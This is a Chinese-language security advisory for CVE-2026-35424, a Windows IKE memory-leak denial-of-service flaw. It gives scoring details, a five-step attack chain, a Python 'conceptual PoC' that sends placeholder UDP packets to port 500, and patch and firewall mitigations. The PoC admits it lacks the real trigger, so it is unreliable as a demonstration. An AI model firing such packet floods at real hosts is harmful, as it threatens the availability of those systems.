CVE-2026-35424 CVSS 7.5 高危

CVE-2026-35424 Windows IKE协议内存泄漏致拒绝服务

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35424

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Windows Internet Key Exchange (IKE) Protocol

漏洞概述

Windows Internet Key Exchange (IKE) 协议中存在内存释放缺失漏洞，攻击者无需认证即可通过网络利用该漏洞耗尽系统资源，导致目标服务拒绝响应，严重影响系统可用性。

技术细节

该漏洞源于 Windows IKE 协议实现中的内存管理错误。在处理网络连接或数据包时，系统未能及时释放不再使用的内存块。由于攻击复杂度低且无需用户交互，远程攻击者可通过发送特制的网络请求触发该缺陷。随着攻击持续，内存泄漏累积导致系统资源耗尽，最终引发服务崩溃或停止响应。CVSS 3.1 向量为 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H，表明其主要影响可用性。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别开启 UDP 500 (IKE) 端口的 Windows 主机。

STEP 2

武器化

攻击者准备能够触发 IKE 协议内存泄漏逻辑的特制网络数据包。

STEP 3

投递

通过互联网向目标主机的 IKE 服务端口发送恶意数据包。

STEP 4

利用

目标系统处理数据包时发生内存泄漏，系统内存资源逐渐被耗尽。

STEP 5

影响

由于内存不足，IKE 服务停止响应，甚至导致系统崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

# Conceptual PoC for CVE-2026-35424
# This script attempts to trigger memory exhaustion in Windows IKE service.
# Note: Actual trigger varies based on specific vulnerability details.

def send_ike_packets(target_ip, target_port=500, count=1000):
    """
    Sends UDP packets to the IKE service port to potentially trigger memory leak.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # In a real scenario, specific payload bytes are required to trigger the leak.
        # This is a placeholder payload.
        payload = b"\x00\x00\x00\x00" 
        
        print(f"[*] Sending {count} packets to {target_ip}:{target_port}...")
        for i in range(count):
            sock.sendto(payload, (target_ip, target_port))
            # Small delay to simulate interaction or avoid immediate rate limiting
            time.sleep(0.01) 
            
        print("[+] Packet transmission completed.")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with target IP
    send_ike_packets(target)

影响范围

Windows (具体受影响版本需参考微软官方安全公告)

防御指南

临时缓解措施

建议立即应用微软提供的安全补丁以修复漏洞。在无法立即打补丁的情况下，应通过网络防火墙阻断非受信网络对 IKE 端口（UDP 500/4500）的访问，仅允许受信任的 IP 地址建立 VPN 连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表